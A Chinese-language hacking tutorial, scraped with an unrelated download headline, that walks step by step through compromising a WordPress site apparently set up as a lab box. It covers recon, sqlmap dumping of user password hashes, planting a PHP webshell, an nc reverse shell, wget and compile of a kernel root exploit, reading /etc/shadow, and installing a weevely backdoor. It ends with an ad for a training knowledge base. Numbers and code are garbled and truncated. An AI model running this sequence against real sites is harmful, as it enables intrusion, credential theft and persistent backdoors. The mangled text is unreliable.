核心内容摘要
Mafos免费下载安装:开启你的数字生活新篇章
黑客是如何攻破一个网站的长文图解全流程讲解黑客技术零基础入门到精通教程一篇科普文很适合小白长文请静下心看。
****通过本文你将了解黑客常用的入手思路和技术手法适合热爱网络信息安全的新手朋友了解学习。
本文将从最开始的信息收集开始讲述黑客是如何一步步的攻破你的网站和服务器的。
阅读本文你会学到以下内容
渗透测试前的简单信息收集。
sqlmap的使用
nmap的使用
nc反弹提权
linux系统的权限提升
backtrack 5中渗透测试工具nikto和w3af的使用等.假设黑客要入侵的你的网站域名为:hack-test.com让我们用ping命令获取网站服务器的IP地址现在我们获取了网站服务器的IP地址为:
173.
236.
1
113寻找同一服务器上的其它网站我们使用sameip.org.26 sites hosted on IP Address
173.
236.
1
113IDDomainSite Link1hijackthisforum.comhijackthisforum.com2sportforum.netsportforum.net3freeonlinesudoku.netfreeonlinesudoku.net4cosplayhell.comcosplayhell.com5videogamenews.orgvideogamenews.org6gametour.comgametour.com7qualitypetsitting.netqualitypetsitting.net8brendanichols.combrendanichols.com98ez.com8ez.com10hack-test.comhack-test.com11kisax.comkisax.com12paisans.compaisans.com13mghz.commghz.com14debateful.comdebateful.com15jazzygoodtimes.comjazzygoodtimes.com16fruny.comfruny.com17vbum.comvbum.com18wuckie.comwuckie.com19force5inc.comforce5inc.com20virushero.comvirushero.com21twincitiesbusinesspeernetwork.comtwincitiesbusinesspeernetwork.com22jennieko.comjennieko.com23davereedy.comdavereedy.com24joygarrido.comjoygarrido.com25prismapp.comprismapp.com26utiligolf.comutiligolf.com
173.
236.
1
113上有26个网站很多黑客为了攻破你的网站可能会检查同服务器上的其它网站但是本次是以研究为目标我们将抛开服务器上的其它网站只针对你的网站来进行入侵检测。
我们需要关于你网站的以下信息\
DNS records (A, NS, TXT, MX and SOA)\
Web Server Type (Apache, IIS, Tomcat)\
Registrar (the company that owns your domain)\
Your name, address, email and phone\
Scripts that your site uses (php, asp, asp.net, jsp, cfm)\
Your server OS (Unix,Linux,Windows,Solaris)\
Your server open ports to internet (80, 443, 21, etc.)让我们开始找你网站的DNS记录我们用who.is来完成这一目标.我们发现你的DNS记录如下让我们来确定web服务器的类型发现你的Web服务器是apache接下来确定它的版本.IP:
173.
236.
1
113Website Status: activeServer Type: ApacheAlexa Trend/Rank: 1 Month:3,213,968 3 Month: 2,161,753Page Views per Visit: 1 Month:
0 3Month:
7接下来是时候寻找你网站域名的注册信息,你的电话、邮箱、地址等.我们现在已经获取了你的网站域名的注册信息包括你的重要信息等.我们可以通过backtrack5中的whatweb来获取你的网站服务器操作系统类型和服务器的版本.我们发现你的网站使用了著名的php整站程序wordpress服务器的的系统类型为FedoraLinuxWeb服务器版本Apache
2.
2.
继续查看网站服务器开放的端口用渗透测试工具nmap:1-Find services that run on server(查看服务器上运行的服务)2-Find server OS(查看操作系统版本)只有80端口是开放的,操作系统是Linux
2.
22Fedora Core 6现在我们已经收集了所有关于你网站的重要信息,接下来开始扫描寻找漏洞,比如:Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF等等.我们将使用Nikto来收集漏洞信息:rootbt:/pentest/web/nikto# perlnikto.pl -h hack-test.com我们也会用到Backtrack 5 R1中的W3AF 工具:rootbt:/pentest/web/w3af#./w3af_gui我们输入要检测的网站地址,选择完整的安全审计选项.稍等一会你将会看到扫描结果.发现你的网站存在sql注入漏洞、XSS漏洞、以及其它的漏洞.让我们来探讨SQL注入漏洞.http://hack-test.com/Hackademic_RTB1/?catd27z220我们通过工具发现这个URL存在SQL注入我们通过Sqlmap来检测这个url.Using sqlmap with –u url过一会你会看到输入N按回车键继续我们发现你的网站存在mysql显错注入mysql数据库版本是
5.
我们通过加入参数”-dbs”来尝试采集数据库名.发现三个数据库,接下来通过参数”-D wordpress -tables”来查看wordpress数据库的所有表名通过参数“-T wp_users –columns ”来查看wp_users表中的字段.接下来猜解字段user_login和user_pass的值.用参数”-C user_login,user_pass–dump”我们会发现用户名和密码hashes值. 我们需要通过以下在线破解网站来破解密码hasheshttp://www.onlinehashcrack.com/free-hash-reverse.php登陆wordpress的后台wp-admin尝试上传php webshell到服务器以方便运行一些linux命令.在插件页面寻找任何可以编辑的插件.我们选择Textile这款插件编辑插入我们的php webshell点击更新文件然后访问我们的phpwebshell.Phpwebshell被解析了我们可以控制你网站的文件但是我们只希望获得网站服务器的root权限,来入侵服务器上其它的网站。
我们用NC来反弹一个shell,首先在我们的电脑上监听5555端口.然后在Php webshell上反向连接我们的电脑输入你的IP和端口
点击连接我们会看到接下来我们尝试执行一些命令id uid48(apache) gid489(apache) groups489(apache) 用来显示用户的id和组 pwd /var/www/html/Hackademic_RTB1/wp-content/plugins 显示服务器上当前的路径 uname -a Linux HackademicRTB1
2.
6.
3
5-
fc
i686 #1 SMP Sat Nov 721:41:45 EST 2009 i686 i686 i386 GNU/Linux显示内核版本信息现在我们知道服务器的内核版本是
2.
6.
3
5-
fc
1
1686,我们在exploit-db.com中搜索此版本的相关漏洞.在服务器上测试了很多exp之后我们用以下的exp来提升权限.http://www.exploit-db.com/exploits/15285我们在nc shell上执行以下命令:wgethttp://www.exploit-db.com/exploits/15285 -o roro.c(下载exp到服务器并重命名为roro.c)注很多linux内核的exp都是C语言开发的,因此我们保存为.c扩展名.exp roro.c代码如下#include#include#include#include#include#include#include#include#include#include#include#define RECVPORT 5555#define SENDPORT 6666int prep_sock(int port){int s, ret;struct sockaddr_in addr;s socket(PF_RDS, SOCK_SEQPACKET,
;if(s
{printf(“[*] Could not open socket.”);exit(-
;}memset(addr, 0, sizeof(addr));通过以上代码我们发现该exp是C语言开发的我们需要将它编译成elf格式的,命令如下:gcc roro.c –ororo接下来执行编译好的exp./roro执行完成之后我们输入id命令id我们发现我们已经是root权限了uid0(root) gid0(root)现在我们可以查看/etc/shadow文件cat/etc/shadow我们可以使用”john theripper”工具破解所有用户的密码.但是我们不会这样做我们需要在这个服务器上留下后门以方便我们在任何时候访问它.我们用weevely制作一个php小马上传到服务器上.
weevely使用选项rootbt:/pentest/backdoors/web/weevely#./main.py -
用weevely创建一个密码为koko的php后门rootbt:/pentest/backdoors/web/weevely#./main.py -g -o hax.php -p koko接下来上传到服务器之后来使用它rootbt:/pentest/backdoors/web/weevely#./main.py -t -uhttp://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -pkoko测试我们的hax.php后门学习资源如果你是也准备转行学习网络安全黑客或者正在学习这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你知识库由360智榜样学习中心独家打造出品旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力熟练掌握基础攻防到深度对抗。
知识库价值深度 本知识库超越常规工具手册深入剖析攻击技术的底层原理与高级防御策略并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等提供了独到的技术视角和实战验证过的对抗方案。
广度 面向企业安全建设的核心场景渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点是应对复杂攻防挑战的实用指南。
实战性 知识库内容源于真实攻防对抗和大型演练实践通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。
部分核心内容展示360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。
360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。
内容组织紧密结合攻防场景辅以大量真实环境复现案例、自动化工具脚本及配置解析。
通过策略讲解、原理剖析、实战演示相结合是你学习过程中好帮手。